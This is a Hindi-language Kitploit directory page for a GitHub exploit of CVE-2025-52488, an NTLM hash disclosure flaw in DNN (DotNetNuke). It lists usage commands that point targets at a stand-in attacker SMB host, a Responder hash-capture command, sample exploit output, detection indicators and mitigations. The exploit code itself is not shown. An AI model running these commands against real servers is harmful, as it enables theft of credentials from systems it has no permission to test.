Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/sh4den/cve-2025-52488
टोहीपासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करना
GitHubsh4den/cve-2025-52488

CVE-2025-52488

यह एक्सप्लॉइट DNN (पूर्व में DotNetNuke) संस्करण 6.0.0 से 10.0.1 से पहले के संस्करणों में एक भेद्यता को लक्षित करता है जो हमलावरों को यूनिकोड पथ सामान्यीकरण हमलों के माध्यम से NTLM हैश का खुलासा करने की अनुमति देता है।

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
CVE-2025-52488 — यह एक्सप्लॉइट DNN (पूर्व में DotNetNuke) संस्करण 6.0.0 से 10.0.1 से पहले के संस्करणों में एक भेद्यता को लक्षित करता है जो हमलावरों को यूनिकोड पथ सामान्यीकरण हमलों के माध्यम से NTLM हैश का खुलासा करने की अनुमति देता है। | Kitploit

DNN यूनिकोड पथ सामान्यीकरण NTLM हैश प्रकटीकरण शोषण (CVE-2025-52488)

अवलोकन

यह शोषण DNN (पूर्व में DotNetNuke) संस्करण 6.0.0 से 10.0.1 से पहले तक की एक कमजोरी को लक्षित करता है जो हमलावरों को यूनिकोड पथ सामान्यीकरण हमलों के माध्यम से NTLM हैश प्रकट करने की अनुमति देता है।

कमजोरी विवरण

  • CVE पहचानकर्ता: CVE-2025-52488
  • गंभीरता: उच्च (CVSS 8.6)
  • प्रभावित संस्करण: 6.0.0 से 10.0.1 से पहले तक
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण: आवश्यक नहीं

यह कैसे काम करता है

यह शोषण विंडोज/.NET की खामियों और यूनिकोड सामान्यीकरण का दुरुपयोग करता है ताकि लक्ष्य DNN सर्वर को हमलावर-नियंत्रित सर्वर पर SMB अनुरोध करने के लिए मजबूर किया जा सके, जिससे प्रमाणीकरण प्रक्रिया के दौरान संभावित रूप से NTLM हैश उजागर हो सकते हैं।

पूर्वापेक्षाएँ

  1. Python 3.7+
  2. आवश्यक पैकेज (pip install -r requirements.txt से स्थापित करें)
  3. NTLM हैश कैप्चर करने के लिए SMB सर्वर (जैसे, Responder, Burp Collaborator)

उपयोग

बुनियादी उपयोग

root@kitploit:~
python main.py targets.txt attacker.example.com

कस्टम पैरामीटर्स के साथ

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

तर्क

  • targets: DNN होस्ट की सूची वाली फ़ाइल (एक प्रति पंक्ति)
  • smb_server: NTLM हैश कैप्चर करने के लिए SMB सर्वर होस्टनाम/IP
  • -t, --threads: समवर्ती थ्रेड की संख्या (डिफ़ॉल्ट: 10)
  • --timeout: सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)

लक्ष्य फ़ाइल प्रारूप

लक्ष्य URL वाली एक टेक्स्ट फ़ाइल बनाएं, एक प्रति पंक्ति:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

SMB सर्वर सेट करना

आप NTLM हैश कैप्चर करने के लिए Responder जैसे टूल का उपयोग कर सकते हैं:

root@kitploit:~
responder -I eth0 -wrf

या आउट-ऑफ-बैंड डिटेक्शन के लिए Burp Collaborator का उपयोग करें।

उदाहरण आउटपुट

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

डिटेक्शन संकेतक

शोषण निम्नलिखित DNN संकेतकों की तलाश करता है:

  • dnn_IsMobile कुकी
  • प्रतिक्रिया में dotnetnuke
  • प्रतिक्रिया में dnnconnect
  • प्रतिक्रिया में DNN Platform

शमन

  • DNN को संस्करण 10.0.1 या बाद में अपडेट करें
  • बाहरी सर्वरों पर SMB अनुरोधों को रोकने के लिए नेटवर्क-स्तरीय नियंत्रण लागू करें
  • संदिग्ध फ़ाइल अपलोड प्रयासों की निगरानी करें

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर करें जिनके आप मालिक हैं या जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।

संदर्भ

  • CVE-2025-52488
  • Assetnote Research
टूल डाउनलोड करें